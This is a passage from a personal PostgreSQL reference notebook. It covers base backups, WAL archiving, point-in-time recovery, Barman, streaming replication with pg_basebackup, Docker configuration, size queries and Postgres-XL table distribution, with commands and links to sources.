--max-rate=RATE https://opensourcedbms.com/dbms/point-in-time-recovery-pitr-using-pg_basebackup-with-postgresql-9-2/

42.1.29 base backup

In order for the standby to start replicating, the entire database needs to be archived and then reloaded into the standby. This process is called a “base backup”, and can be performed on the master and then transferred to the slave. Let’s create a snapshot to transfer to the slave by capturing a binary backup of the entire PostgreSQL data directory. su - postgres psql -c "SELECT pg_start_backup('backup', true)" rsync -av --exclude postmaster.pid --exclude pg_xlog /var/lib/postgresql/9.1/main/

˓→[email protected]:/var/lib/postgresql/9.1/main/ psql -c "SELECT pg_stop_backup()" http://blog.codepath.com/2012/02/13/adventures-in-scaling-part-3-postgresql-streaming-replication/

42.1.30 Postgres replica and docker https://gist.github.com/mattupstate/c6a99f7e03eff86f170e

42.1.31 Backup Control Functions http://www.postgresql.org/docs/9.4/static/functions-admin.html pg_switch_xlog() Force switch to a new transaction log file (restricted to superusers)

42.1.32 PostgreSQL Streaming Replication http://blog.codepath.com/2012/02/13/adventures-in-scaling-part-3-postgresql-streaming-replication/ http://dba.stackexchange.com/questions/30609/postgresql-can-i-do-pg-start-backup-on-a-live-running-db-under-load

42.1. Tips 283 Omid Raha MyStack Documentation, Release 0.1

42.1.33 pg_basebackup vs pg_start_backup

PostgreSQL supports Write Ahead Log (WAL) mechanism like Oracle. So everything will be written to (redo)logs before they written into actual datafiles. So we will use a similar method to Oracle. We need to start “the backup mode”, copy the (data) files, and stop the backup mode, and add the archived logs to our backup. There are SQL commands for starting backup mode (pg_start_backup) and for stopping backup mode (pg_stop_backup), and we can copy the files using OS commands. Good thing is, since 9.1, PostgreSQL comes with a backup tool named “pg_basebackup”. It’ll do everything for us. http://www.gokhanatil.com/2014/12/how-to-backup-and-restore-postgresql-9-3-databases.html

42.1.34 Example of Standalone Hot Backups and recovery

To prepare for standalone hot backups, set wal_level to archive (or hot_standby), archive_mode to on, and set up an archive_command that performs archiving only when a switch file exists.

$ vim postgresql.conf wal_level= hot_standby archive_mode= on archive_command= 'test ! -f /var/lib/postgresql/9.x/backup_in_progress || (test !

˓→ -f /var/lib/postgresql/9.x/archive/%f && cp %p /var/lib/postgresql/9.x/archive/%f)'

This command will perform archiving when /var/lib/pgsql/backup_in_progress exists, and otherwise silently return zero exit status (allowing PostgreSQL to recycle the unwanted WAL file). With this preparation, a backup can be taken using a script like the following:

touch /var/lib/postgresql/9.x/backup_in_progress psql -c "select pg_start_backup('hot_backup');" -U postgres tar -cf /var/lib/postgresql/9.x/backup.tar /var/lib/postgresql/9.x/main/ psql -c "select pg_stop_backup();" -U postgres rm /var/lib/postgresql/9.x/backup_in_progress tar -rf /var/lib/postgresql/9.x/backup.tar /var/lib/postgresql/9.x/archive/

The switch file /var/lib/postgresql/9.x/backup_in_progress is created first, enabling archiving of completed WAL files to occur. After the backup the switch file is removed. Archived WAL files are then added to the backup so that both base backup and all required WAL files are part of the same tar file. Please remember to add error handling to your backup scripts. Note that If only wal_level=hot_standby is set in postgresql.conf , we get this warning, after running pg_stop_backup command:

root@51b1a7d96fbb:/# psql -c "select pg_stop_backup();" -U postgres NOTICE: WAL archiving is not enabled; you must ensure that all required WAL segments

˓→are copied through other means to complete the backup pg_stop_backup ------0/20046E8 (1 row)

And if only set wal_level=hot_standby and archive_mode=on are set in postgresql.conf , we get this warning, after running pg_stop_backup command:

root@51b1a7d96fbb:/# psql -c "select pg_stop_backup();" -U postgres NOTICE: pg_stop_backup cleanup done, waiting for required WAL segments to be archived WARNING: pg_stop_backup still waiting for all required WAL segments to be archived

˓→(60 seconds elapsed) (continues on next page)

284 Chapter 42. PostgreSQL Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) HINT: Check that your``archive_command`` is executing properly. pg_stop_backup can be canceled safely, but the database backup will not be usable

˓→without all the WAL segments.

Recover data

Now that the base backup is restored, you must to tell PostgreSQL how to apply the recovery procedure. First, create file called recovery.conf in the data directory, /var/lib/postgresql/9.x/main/recovery.conf. The contents should minimally include the following line, adjusted to the location of the WAL files.

$ sudo service postgresql stop $ sudo mv /var/lib/postgresql/9.x/main /var/lib/postgresql/9.x/_main $ sudo mkdir /var/lib/postgresql/9.x/restore $ sudo tar -xvf /var/lib/postgresql/9.x/backup.tar -C /var/lib/postgresql/9.x/restore $ sudo mv /var/lib/postgresql/9.x/restore/var/lib/postgresql/9.x/main/ /var/lib/

˓→postgresql/9.x/main $ sudo vim /var/lib/postgresql/9.x/main/recovery.conf restore_command= 'cp /var/lib/postgresql/9.x/archive/%f %p' $ sudo chown -R postgres:postgres /var/lib/postgresql/9.x/main $ sudo chown -R postgres:postgres /var/lib/postgresql/9.x/archive $ sudo service postgresql restart $ sudo tail -f /var/log/postgresql/postgresql-9.x-main.log https://www.zetetic.net/blog/2012/3/9/point-in-time-recovery-from-backup-using-postgresql-continuo.html https://www.zetetic.net/blog/2011/2/1/postgresql-on-ebs-moving-to-aws-part-3.html http://www.mkyong.com/database/postgresql-point-in-time-recovery-incremental-backup/ http://www.postgresql.org/docs/9.4/static/continuous-archiving.html

42.1.35 Backup with pg_basebackup

The backup is made over a regular PostgreSQL connection, and uses the replication protocol. The connection must be made with a superuser or a user having REPLICATION permissions, and pg_hba.conf must explicitly permit the replication connection. The server must also be configured with max_wal_senders set high enough to leave at least one session available for the backup.

$ sudo vim /etc/postgresql/9.x/main/postgresql.conf max_wal_senders=1 $ sudo vim /etc/postgresql/9.5/main/pg_hba.conf local replication postgres trust $ sudo serivce postgresql restart $ sudo pg_basebackup --xlog --format=t -D /var/lib/postgresql/9.x/backup/`date +%Y%m

˓→%d` -U postgres http://www.gokhanatil.com/2014/12/how-to-backup-and-restore-postgresql-9-3-databases.html https://opensourcedbms.com/dbms/point-in-time-recovery-pitr-using-pg_basebackup-with-postgresql-9-2/ http://www.postgresql.org/docs/9.4/static/app-pgbasebackup.html

42.1. Tips 285 Omid Raha MyStack Documentation, Release 0.1

42.1.36 Find Postgresql Version

$ sudo psql -c 'SELECT version()' -U postgres

42.1.37 Barman

# On The Master SERVER $ sudo apt-get install rsync $ vim /etc/postgresql/9.x/main/postgresql.conf wal_level= hot_standby archive_mode= on archive_command= 'rsync -a %p barman@:/var/lib/barman/main/

˓→wals/%f'

# On The BACKUP SERVER $ sudo su - barman $ vim ~/.ssh/authorized_keys # add public key

# On The Master SERVER $ vim ~/.ssh/authorized_keys # add public key

$ vim /etc/barman.conf [main] description= "Main PostgreSQL Database" ssh_command= ssh root@ conninfo= host= user=postgres

$ barman check main

Server main: PostgreSQL: OK archive_mode: OK wal_level: OK archive_command: OK continuous archiving: OK directories: OK retention policy settings: OK backup maximum age: OK(no last_backup_maximum_age provided) compression settings: OK minimum redundancy requirements: OK(have0 backups, expected at least0) ssh: OK(PostgreSQL server) not in recovery: OK https://sourceforge.net/projects/pgbarman/files/1.6.0/

42.1.38 pg_receivexlog

$ pg_receivexlog -D /var/lib/postgresql/9.5/backup/rxlog -U postgres http://www.postgresql.org/docs/9.4/static/app-pgreceivexlog.html pg_receivexlog is used to stream transaction log from a running PostgreSQL cluster.

286 Chapter 42. PostgreSQL Omid Raha MyStack Documentation, Release 0.1

The transaction log is streamed using the streaming replication protocol, and is written to a local directory of files. This directory can be used as the archive location for doing a restore using point-in-time recovery. pg_receivexlog streams the transaction log in real time as it’s being generated on the server, and does not wait for segments to complete like archive_command does. For this reason, it is not necessary to set archive_timeout when using pg_receivexlog. The transaction log is streamed over a regular PostgreSQL connection, and uses the replication protocol. The connection must be made with a superuser or a user having REPLICATION permissions, and pg_hba.conf must explicitly permit the replication connection. The server must also be configured with max_wal_senders set high enough to leave at least one session available for the stream. If the connection is lost, or if it cannot be initially established, with a non-fatal error, pg_receivexlog will retry the connection indefinitely, and reestablish streaming as soon as possible. To avoid this behavior, use the -n parameter.

42.1.39 what are the pg_clog and pg_xlog directories ?

The pg_xlog contains Postgres Write Ahead Logs (WAL, Postgres implementation of transaction logging) files (normally 16MB in size, each). The pg_clog contains the commit log files which contain transaction commit status of a transaction. One main purpose is to perform a database recovery in case of a crash by replaying these logs.

42.1.40 Getting WAL files from Barman with ‘get-wal’

Barman 1.5.0 enhances the robustness and business continuity capabilities of PostgreSQL clusters, integrating the get-wal command with any standby server’s restore_command. Barman currently supports only WAL shipping from the master using archive_command (Postgres 9.5 will allow users to ship WAL files from standby servers too through “archive_mode = always” and we’ll be thinking of something for the next Barman release). However, very frequently we see users that prefer to ship WAL files from Postgres to multiple locations, such as one or more standby servers or another file storage destination. In these cases, the logic of these archive command scripts can easily become quite complex and, in the long term, dan- gerously slip through your grasp (especially if PostgreSQL and its operating system are not under strict monitoring). With 1.5.0 you can even integrate Barman with a standby server’s restore_command, adding a fallback method to streaming replication synchronisation, to be used in case of temporary (or not) network issues with the source of the stream (be it a master or another standby). All you have to do is add this line in the standby’s recovery.conf file:

# Change 'SERVER' with the actual ID of the server in Barman restore_command= 'ssh barman@pgbackup barman get-wal SERVER %f > %p'

42.1. Tips 287 Omid Raha MyStack Documentation, Release 0.1

http://blog.2ndquadrant.com/getting-wal-files-from-barman-with-get-wal/

42.1.41 verifying data consistency between two postgresql databases http://stackoverflow.com/questions/16550013/verifying-data-consistency-between-two-postgresql-databases

42.1.42 How to check the replication delay in PostgreSQL? http://stackoverflow.com/questions/28323355/how-to-check-the-replication-delay-in-postgresql

42.1.43 Streaming replication slots in PostgreSQL 9.4 http://blog.2ndquadrant.com/postgresql-9-4-slots/

42.1.44 Continuous Archiving and Point-in-Time Recovery (PITR) http://www.postgresql.org/docs/9.4/static/continuous-archiving.html In order to restore a backup, you need to have the base archive of all the data files, plus a sequence of xlogs. An “incremental backup” can be made, of just some more xlogs in the sequence. Note that if you have any missing xlogs, then recovery will stop early.

42.1.45 Point In Time Recovery From Backup using PostgreSQL Continuous Archv- ing https://www.zetetic.net/blog/2012/3/9/point-in-time-recovery-from-backup-using-postgresql-continuo.html

288 Chapter 42. PostgreSQL Omid Raha MyStack Documentation, Release 0.1

After a transaction commits on the master, the time taken to transfer data changes to a remote node is usually referred to as the latency, or replication delay. Once the remote node has received the data, changes must then be applied to the remote node, which takes an amount of time known as the apply delay. The total time a record takes from the master to a downstream node is the replication delay plus the apply delay.

42.1.46 Purpose of archiving in master?

WAL archiving is useful when you’re running streaming replication, because there’s a limit to how much WAL the master will retain. If you don’t archive WAL, and the replica gets s far behind that the master has discarded WAL it still needs, it cannot recover and must be replaced with a fresh base backup from the master. It’s also useful for PITR for disaster recovery purposes.

42.1.47 Setting up file-based replication - deprecated

1. Identify your archive location and ensure that it has sufficient space. This recipe assumes that the archive is a directory on the standby node, identified by the $PGARCHIVE environment variable. This is set on both the master and standby nodes, as the master must write to the archive and the standby must read from it. The standby node is identified on the master using $STANDBYNODE . 2. Configure replication security. Perform a key exchange to allow the master and the standby to run the rsync command in either direction. 3. Adjust the master’s parameters in postgresql.conf , as follows:

wal_level= 'archive' archive_mode= on archive_command= 'scp %p $STANDBYNODE:$PGARCHIVE/%f' archive_timeout= 30

4. Adjust Hot Standby parameters if required (see the Hot Standby and read scalability recipe). 5. Take a base backup, very similar to the process for taking a physical backup described in Chapter 11, Backup and Recovery. 6. Start the backup by running the following command:

psql -c "select pg_start_backup('base backup for log shipping')"

7. Copy the data files (excluding the pg_xlog directory). Note that this requires some security configuration to ensure that rsync can be executed without needing to provide a password when it executes. If you skipped step 2, do this now, as follows:

rsync -cva --inplace --exclude=*pg_xlog* \ ${PGDATA}/ $STANDBYNODE:$PGDATA

8. Stop the backup by running the following command:

psql -c "select pg_stop_backup(), current_timestamp"

9. Set the recovery.conf parameters in the data directory on the standby server, as follows:

42.1. Tips 289 Omid Raha MyStack Documentation, Release 0.1

standby_mode= 'on' restore_command= 'cp $PGARCHIVE/%f %p' archive_cleanup_command= 'pg_archivecleanup $PGARCHIVE %r' trigger_file= '/tmp/postgresql.trigger.5432'

10. Start the standby server. 11. Carefully monitor the replication delay until the catch-up period is over. During the initial catch-up period, the replication delay will be much higher than we would normally expect it to be. You are advised to set hot_standby to off for the initial period only. Transaction log (WAL) files will be written on the master. Setting wal_level to archive ensures that we collect all of the changed data, and that WAL is never optimized away. WAL is sent from the master to the archive using archive_command , and from there, the standby reads WAL files using restore_command . Then, it replays the changes. The archive_command is executed when a file becomes full, or an archive_timeout number of seconds have passed since any user inserted change data into the transaction log. If the server does not write any new transaction log data for an extended period, then files will switch every checkpoint_timeout seconds. This is normal, and not a problem. The preceding configuration assumes that the archive is on the standby, so the restore_command shown is a simple copy command ( cp ). If the archive was on a third system, then we would need to either mount the filesystem remotely or use a network copy command. The archive_cleanup_command ensures that the archive only holds the files that the standby needs for restarting, in case it stops for any reason. Files older than the last file required are deleted regularly to ensure that the archive does not overflow. Note that if the standby is down for an extended period, then the number of files in the archive will continue to accumulate, and eventually they will overflow. The number of files in the archive should also be monitored. In the configuration shown in this recipe, a contrib module named pg_archivecleanup is used to remove files from the archive. This is a module supplied with PostgreSQL 9.0. The pg_archivecleanup module is designed to work with one standby node at a time. Note that pg_archivecleanup requires two parameters: the archive directory and %r , with a space between them. PostgreSQL transforms %r into the cut-off filename.

42.1.48 Setting up streaming replication

Log shipping is a replication technique used by many database management systems. The master records change in its transaction log (WAL), and then the log data is shipped from the master to the standby, where the log is replayed. In PostgreSQL, streaming replication transfers WAL data directly from the master to the standby, giving us integrated security and reduced replication delay. There are two main ways to set up streaming replication: with or without an additional archive. 1. Identify your master and standby nodes, and ensure that they have been configured according to the Replication best practices recipe. 2. Configure replication security. Create or confirm the existence of the replication user on the master node:

CREATE USER repuser SUPERUSER LOGIN CONNECTION LIMIT1 ENCRYPTED PASSWORD 'changeme';

3. Allow the replication user to authenticate. The following example allows access from any IP address using MD5- encrypted password authentication; you may wish to consider other options. Add the following line to pg_hba.conf :

290 Chapter 42. PostgreSQL Omid Raha MyStack Documentation, Release 0.1

Host replication repuser 127.0.0.1/0 md5

4. Set the logging options in postgresql.conf on both the master and the standby so that you can get more information regarding replication connection attempts and associated failures:

log_connections= on

5. Set max_wal_senders on the master in postgresql.conf , or increase it if the value is already nonzero:

max_wal_senders=2 wal_level= 'archive' archive_mode= on

6. Adjust wal_keep_segments on the master in postgresql.conf . Set this to a value no higher than the amount of free space on the drive on which the pg_xlog directory is mounted, divided by 16 MB. If pg_xlog isn’t mounted on a separate drive, then don’t assume that all of the current free space is available for transaction log files.

wal_keep_segments= 10000 # e.g. 160 GB

7. Adjust the Hot Standby parameters if required. 8. Take a base backup, very similar to the process for taking a physical backup: 1. Start the backup:

psql -c "select pg_start_backup('base backup for streaming rep')"

2. Copy the data files (excluding the pg_xlog directory):

rsync -cva --inplace --exclude=*pg_xlog* \ ${PGDATA}/ $STANDBYNODE:$PGDATA

3. Stop the backup:

psql -c "select pg_stop_backup(), current_timestamp"

9. Set the recovery.conf parameters on the standby. Note that primary_conninfo must not specify a database name, though it can contain any other PostgreSQL connection option. Note also that all options in recovery.conf are enclosed in quotes, whereas the postgresql.conf parameters need not be:

standby_mode= 'on' primary_conninfo= 'host=alpha user=repuser' trigger_file= '/tmp/postgresql.trigger.5432'

10. Start the standby server. 11. Carefully monitor the replication delay until the catch-up period is over. During the initial catch-up period, the replication delay will be much higher than we would normally expect it to be.

Use pg_basebackup

Here is the alternative procedure, which works with PostgreSQL 9.1 using a tool called pg_basebackup. From PostgreSQL 9.2 onwards, you can run this procedure on a standby node rather than the master: 1.First, perform steps 1 to 5 of the preceding procedure. 2.Use wal_keep_segments , as shown in step 6 of the previous procedure, or in PostgreSQL 9.4 or later, use Replication Slots (see later recipe).

42.1. Tips 291 Omid Raha MyStack Documentation, Release 0.1

3.Adjust the Hot Standby parameters if required (see later recipe). 4.Take a base backup:

pg_basebackup -d 'connection string' -D /path/to_data_dir

For PostgreSQL 9.2 and later versions, you are advised to use the following additional option on the pg_basebackup command line. This option allows the required WAL files to be streamed alongside the base backup on a second session, greatly improving the startup time on larger databases, without the need to fuss over large settings of wal_keep_segments (as seen in step 6 of the previous procedure):

--xlog-method=stream

For PostgreSQL 9.4 and later versions, if the backup uses too many server resources (CPU, memory, disk, or bandwidth), you can throttle down the speed for the backup using the following additional option on the pg_basebackup command line. The RATE value is specified in kB/s by default:

--max-rate=RATE

5.Set the recovery.conf parameters on the standby. Note that primary_conninfo must not specify a database name, though it can contain any other PostgreSQL connection option. Note also that all options in recovery.conf are enclosed in quotes, whereas the postgresql.conf parameters need not be. For PostgreSQL 9.4 and later versions, you can skip this step if you wish by specifying the –write-recovery-conf option on pg_basebackup :

standby_mode= 'on' primary_conninfo= 'host=192.168.0.1 user=repuser' # trigger_file = '' # no need for trigger file 9.1+

6.Start the standby server. 7.Carefully monitor the replication delay until the catch-up period is over. During the initial catch-up period, the replication delay will be much higher than we would normally expect it to be. The pg_basebackup utility also allows you to produce a compressed tar file, using this command: pg_basebackup -F -z

Multiple standby nodes can connect to a single master. Set max_wal_senders to the number of standby nodes, plus at least one. If you are planning to use pg_basebackup -xlog-method=stream , then allow for an additional connection per concurrent backup you plan for. You may wish to set up an individual user for each standby node, though it may be sufficient just to set the application_name parameter in primary_conninfo . The architecture for streaming replication is this: on the master, one WALSender process is created for each standby that connects for streaming replication. On the standby node, a WALReceiver process is created to work cooperatively with the master. Data transfer has been designed and measured to be very efficient—data is typically sent in 8,192-byte chunks, without additional buffering at the network layer. Both WALSender and WALReceiver will work continuously on any outstanding data to be replicated until the queue is empty. If there is a quiet period, then WALReceiver will sleep for 100 ms at a time, and WALSender will sleep for wal_sender_delay . Typically, the value of wal_sender_delay need not be altered because it only affects the behavior during momentary quiet periods. The default value is a good balance between efficiency and data protection.

292 Chapter 42. PostgreSQL Omid Raha MyStack Documentation, Release 0.1

If the master and standby are connected by a low-bandwidth network and the write rate on the master is high, you may wish to lower this value to perhaps 20 ms or 50 ms. Reducing this value will reduce the amount of data loss if the master becomes permanently unavailable, but will also marginally increase the cost of streaming the transaction log data to the standby. The standby connects to the master using native PostgreSQL libpq connections. This means that all forms of authen- tication and security work for replication just as they do for normal connections. Note that, for replication sessions, the standby is the “client” and the master is the “server”, if any parameters need to be configured. Using standard PostgreSQL libpq connections also means that normal network port numbers are used, so no additional firewall rules are required. You should also note that if the connections use SSL, then encryption costs will slightly increase the replication delay and the CPU resources required. If the connection between the master and standby drops, it will take some time for that to be noticed across an indirect network. To ensure that a dropped connection is noticed as soon as possible, you may wish to adjust the timeout settings. If you want a standby to notice that the connection to the master has dropped, you need to set the wal_receiver_timeout value in the postgresql.conf file on the standby. If you want the master to notice that a streaming standby connection has dropped, you can set the wal_sender_timeout parameter in the postgresql.conf file on the master. You may also wish to increase max_wal_senders to one or two more than the current number of nodes so that it will be possible to reconnect even before a dropped connection is noted. This allows a manual restart to re-establish connections more easily. If you do this, then also increase the connection limit for the replication user. Changing that setting requires a restart. Data transfer may stop if the connection drops or the standby server or the standby system is shut down. If replication data transfer stops for any reason, it will attempt to restart from the point of the last transfer. Will that data still be available? Let’s see. For streaming replication, the master keeps a number of files that is at least equal to wal_keep_segments . If the standby database server has been down for long enough, the master will have moved on and will no longer have the data for the last point of transfer. If that should occur, then the standby needs to be reconfigured using the same procedure with which we started. For PostgreSQL 9.2 and later versions, you should plan to use pg_basebackup –xlog- method=stream . If you choose not to, you should note that the standby database server will not be streaming during the initial base backup. So, if the base backup is long enough, we might end up with a situation where replication will never start because the desired starting point is no longer available on the master. This is the error that you’ll get:

FATAL: requested WAL segment 000000010000000000000002 has already been removed

It’s very annoying, and there’s no way out of it—you need to start over. So, start with a very high value of wal_keep_segments . Don’t guess this randomly; set it to the available disk space on pg_xlog divided by 16 MB, or less if it is a shared disk. If you still get that error, then you need to increase wal_keep_segments and try again f you can’t set wal_keep_segments high enough, there is an alternative. You must configure a third server or storage pool with increased disk storage capacity, which you can use as an archive. The master will need to have an archive_command that places files on the archive server, rather than the dummy command shown in the preceding procedure, in addition to parameter settings to allow streaming to take

42.1. Tips 293 Omid Raha MyStack Documentation, Release 0.1

place. The standby will need to retrieve files from the archive using restore_command , as well as streaming using primary_conninfo . Thus, both the master and standby have two modes for sending and receiving, and they can switch between them should failures occur. This is the typical configuration for large databases. Note that this means that the WAL data will be copied twice, once to the archive and once directly to the standby. Two copies are more expensive, but also more robust. The reason for setting archive_mode = on in the preceding procedure is that altering that parameter requires a restart, so you may as well set it on just in case you need it later. All we need to do is use a dummy archive_command to ensure that everything still works OK. By “dummy command”, I mean a command that will do nothing and then provide a return code of zero, for example, cd or true . One thing that is a possibility is to set archive_command only until the end of the catch-up period. After that, you can reset it to a dummy value and then continue with only streaming replication. Data is transferred from the master to the standby only once it has been written (or more precisely, fsynced) to the disk. So, setting synchronous_commit = off will not improve the replication delay, even if it improves performance on the master. Once WAL data is received by the standby, the WAL data is fsynced to disk on the standby to ensure that it is not lost when the standby system restarts.

42.1.49 Difference between fsync and synchronous_commit ? http://dba.stackexchange.com/questions/18509/difference-between-fsync-and-synchronous-commit-postgresql http://www.postgresql.org/docs/9.3/static/runtime-config-wal.html#GUC-SYNCHRONOUS-COMMIT

42.1.50 standby_mode

standby_mode= off

When standby_mode is enabled, the PostgreSQL server will work as a standby. It will continuously wait for the additional XLOG records, using restore_command and/or primary_conninfo. https://github.com/postgres/postgres/blob/master/src/backend/access/transam/recovery.conf.sample#L110

42.1.51 primary_conninfo

primary_conninfo='' # e.g. 'host=localhost port=5432'

If set, the PostgreSQL server will try to connect to the primary using this connection string and receive XLOG records continuously. https://github.com/postgres/postgres/blob/master/src/backend/access/transam/recovery.conf.sample#L120

42.1.52 trigger_file

trigger_file=''

294 Chapter 42. PostgreSQL Omid Raha MyStack Documentation, Release 0.1

By default, a standby server keeps restoring XLOG records from the primary indefinitely. If you want to stop the standby mode, finish recovery and open the system in read/write mode, specify a path to a trigger file. The server will poll the trigger file path periodically and start as a primary server when it’s found. https://github.com/postgres/postgres/blob/master/src/backend/access/transam/recovery.conf.sample#L132 http://www.archaeogeek.com/blog/2011/08/11/setting-up-a-postgresql-standby-servers/

42.1.53 Testing a PostgreSQL slave/master cluster using Docker http://aliceh75.github.io/testing-postgresql-cluster-using-docker

42.1.54 Postgres streaming replication with docker

For custom configuration file, If we do this:

$ docker run --name ps-master -v /somewhere/postgres/master/data:/var/lib/postgresql/

˓→data postgres:9.4 $ docker start ps-master $ vim /somewhere/postgres/master/data/postgresql.conf $ vim /somewhere/postgres/master/data/pg_hba.conf $ docker restart ps-master

As you see, then we need to edit that files and restart server again. Also because of this error: initdb: directory "/var/lib/postgresql/data" exists but is not empty

We can’t do in this way:

$ docker run --rm --name ps-master \ -v /somewhere/postgres/data:/var/lib/postgresql/data \ -v /somewhere/postgres/postgresql.conf:/var/lib/postgresql/data/postgresql.conf \ -v /somewhere/postgres/pg_hba.conf:/var/lib/postgresql/data/pg_hba.conf \ postgres:9.4

But we can use this way by putting some script on special docker-entrypoint-initdb.d directory:

$ docker run --rm --name ps-master -v /somewhere/postgres/data:/var/lib/postgresql/data -v /somewhere/postgres/script:/docker-entrypoint-initdb.d -v /somewhere/postgres/config:/config postgres:9.4

$ ls -la /somewhere/postgres/script

drwxr-xr-x2 postgres postgres 4096 Apr2 12:22 . drwxr-xr-x7 postgres postgres 4096 Apr2 12:18 .. -rw-r--r--1 postgres postgres 169 Apr2 12:22 copy_configuration_files.sh

$ cat /somewhere/postgres/script/copy_configuration_files.sh

#!/bin/bash echo "Copy configuration files !!" (continues on next page)

42.1. Tips 295 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) cp /config/postgresql.conf /var/lib/postgresql/data/postgresql.conf cp /config/pg_hba.conf /var/lib/postgresql/data/pg_hba.conf

$ ls -la /somewhere/postgres/config drwxr-xr-x2 postgres postgres 4096 Apr2 12:22 . drwxr-xr-x7 postgres postgres 4096 Apr2 12:18 .. -rw------1 postgres postgres 4523 Apr2 12:21 pg_hba.conf -rw------1 postgres postgres 21350 Apr2 12:22 postgresql.conf docker run --rm --name ps-master \ -v /somewhere/postgres/data:/var/lib/postgresql/data \ -v /somewhere/postgres/postgresql.conf:/usr/share/postgresql/9.4/postgresql.conf.

˓→sample \ -v /somewhere/postgres/pg_hba.conf:/usr/share/postgresql/9.4/pg_hba.conf.sample \ postgres:9.4 https://github.com/docker-library/postgres/issues/105 https://github.com/docker-library/postgres/pull/127

42.1.55 Show the value of a run-time parameter

$ psql -U postgres postgres=# SHOW ALL; postgres=# SHOW hba_file; http://www.postgresql.org/docs/8.2/static/sql-show.html

42.1.56 Postgres DB Size Command postgres=# select pg_database_size('databaseName'); postgres=# select t1.datname AS db_name, pg_size_pretty(pg_database_size(t1.datname)) as db_size from pg_database t1 order by pg_database_size(t1.datname) desc; postgres=# \l+ postgres=# SELECT pg_database.datname, pg_size_pretty(pg_database_size(pg_database.datname)) AS size FROM pg_database; postgres=# SELECT t.tablename, indexname, c.reltuples AS num_rows, pg_size_pretty(pg_relation_size(quote_ident(t.tablename)::text)) AS table_size, pg_size_pretty(pg_relation_size(quote_ident(indexrelname)::text)) AS index_size, (continues on next page)

296 Chapter 42. PostgreSQL Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) CASE WHEN indisunique THEN 'Y' ELSE 'N' END AS UNIQUE, idx_scan AS number_of_scans, idx_tup_read AS tuples_read, idx_tup_fetch AS tuples_fetched FROM pg_tables t LEFT OUTER JOIN pg_class c ON t.tablename=c.relname LEFT OUTER JOIN ( SELECT c.relname AS ctablename, ipg.relname AS indexname, x.indnatts AS number_

˓→of_columns, idx_scan, idx_tup_read, idx_tup_fetch, indexrelname, indisunique FROM

˓→pg_index x JOIN pg_class c ON c.oid= x.indrelid JOIN pg_class ipg ON ipg.oid= x.indexrelid JOIN pg_stat_all_indexes psai ON x.indexrelid= psai.indexrelid) AS foo ON t.tablename= foo.ctablename WHERE t.schemaname='public' ORDER BY1,2; https://gist.github.com/next2you/628866#file-postgres-long-running-queries-sql

42.1.57 High Availability and Load Balancing http://www.postgresql.org/docs/8.2/static/high-availability.html There are basic 3 types of replication in postgresql i.e Warm, hot standby and Streaming Replication. https://github.com/zalando/patroni https://github.com/sorintlab/stolon https://github.com/CrunchyData/crunchy-containers

42.1.58 Replication https://www.2ndquadrant.com/en/resources/pglogical/

42.1.59 Multi-master replication http://stackoverflow.com/questions/19657514/multi-master-replication-in-postgresql https://en.wikipedia.org/wiki/Multi-master_replication https://wiki.postgresql.org/wiki/Replication,_Clustering,_and_Connection_Pooling#Comparison_matrix https://www.cybertec-postgresql.com/en/postgresql-affiliate-projects-for-horizontal-multi-terabyte-scaling/

42.1. Tips 297 Omid Raha MyStack Documentation, Release 0.1

42.2 Backups

42.2.1 Barman

Barman (Backup and Recovery Manager) is an open-source administration tool for disaster recovery of PostgreSQL servers written in Python. It allows your organisation to perform remote backups of multiple servers in business critical environments and help DBAs during the recovery phase. http://www.pgbarman.org/about/

42.2.2 How To Backup and Restore PostgreSQL Database Using pg_dump and psql

Use pg_dump to get backup:

$ pg_dump -U -h -d > $ pg_dump -U postgres -h 127.0.0.1 -d redmine > redmine.sql

Use psql to restore backup:

$ psql -U -h -d -f $ psql -U postgres -h 172.17.0.2 -d redmine -f redmine_backup_pg_dump.sql http://www.thegeekstuff.com/2009/01/how-to-backup-and-restore-postgres-database-using-pg_dump-and-psql/ http://www.postgresql.org/docs/9.1/static/backup.html

42.3 Postgres-XL

42.4 Nodes Concept

Postgres-XL is composed of three major components called the GTM, Coordinator and Datanode. The GTM is responsible to provide ACID property of transactions. The Datanode stores table data and handle SQL statements locally. The Coordinator handles each SQL statements from applications, determines which Datanode to go, and sends plans on to the appropriate Datanodes. The Coordinators and Datanodes of Postgres-XL are essentially PostgreSQL database servers You usually should run GTM on a separate server because GTM has to take care of transaction requirements from all the Coordinators and Datanodes. To group multiple requests and responses from Coordinator and Datanode processes running on the same server, you can configure GTM-Proxy. GTM-Proxy reduces the number of interactions and the amount of data to GTM. GTM-Proxy also helps handle GTM failures. It is often good practice to run both Coordinator and Datanode on the same server because we don’t have to worry about workload balance between the two, and you can often get at data from replicated tables locally without sending an additional request out on the network. You can have any number of servers where these two components are running. Because both Coordinator and Datanode are essentially PostgreSQL instances, you should configure them to avoid resource conflict. It is very important to assign them different working directories and port numbers. https://www.postgres-xl.org/documentation/tutorial-arch.html

298 Chapter 42. PostgreSQL Omid Raha MyStack Documentation, Release 0.1

42.5 Table distributing concept

CREATE TABLE DISTRIBUTE BY ...

REPLICATION Each row of the table will be replicated to all the Datanode of the Postgres-XL database cluster. ROUNDROBIN Each row of the table will be placed in one of the Datanodes in a round-robin manner. The value of the row will not be needed to determine what Datanode to go. HASH ( column_name ) Each row of the table will be placed based on the hash value of the specified column. Following type is allowed as distribution column: INT8, INT2, OID, INT4, BOOL, INT2VECTOR, OIDVECTOR, CHAR, NAME, TEXT, BPCHAR, BYTEA, VARCHAR, NUMERIC, MONEY, ABSTIME, RELTIME, DATE, TIME,TIMESTAMP, TIMESTAMPTZ, INTERVAL, and TIMETZ. Please note that floating point is not allowed as a basis of the distribution column. MODULO ( column_name ) Each row of the table will be placed based on the modulo of the specified column. Following type is allowed as distribution column: INT8, INT2, INT4, BOOL, ABSTIME, RELTIME, DATE. Please note that floating point is not allowed as a basis of the distribution column. If DISTRIBUTE BY is not specified, columns with UNIQUE constraint will be chosen as the distribution key. If no such column is specified, distribution column is the first eligible column in the definition. If no such column is found, then the table will be distributed by ROUNDROBIN. You could Alter a replicated table to make it a distributed table. https://www.postgres-xl.org/documentation/sql-createtable.html https://www.postgres-xl.org/documentation/tutorial-createcluster.html

42.6 Shard limitation

